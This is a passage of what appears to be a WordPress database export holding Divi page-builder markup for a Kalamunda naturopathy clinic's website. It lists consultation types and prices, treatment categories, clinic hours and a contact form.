inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\" border_radii=\"off||||\" module_alignment=\"center\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" custom_padding=\"|0px||0px|false|false\" sticky_enabled=\"0\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\" background_color=\"#ffffff\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"4_4\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-06-04 20:45:05','2021-06-04 12:45:05','',28,'https://verdenaturopathy.com.au/?p=317',0,'revision','',0),(25,0,'2021-04-30 12:05:06','2021-04-30 12:05:06','','Blog','','publish','closed','closed','','blog','','','2021-04-30 12:05:06','2021-04-30 12:05:06','',0,'https://verde.desidrivers.com.au/blog/',0,'page','',0),(26,1,'2021-04-30 12:05:06','2021-04-30 04:05:06','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" min_height=\"0px\" custom_margin=\"||1px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" min_height=\"209.5px\" custom_padding=\"||38px|||\" hover_enabled=\"0\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" sticky_enabled=\"0\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Let\'s connect.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"550px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 9am-4pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Wed: 9:30am-4pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 11am-7pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking) & Mead Medical, Kalamunda (Tuesday mornings only) </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#e6e5e1\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" 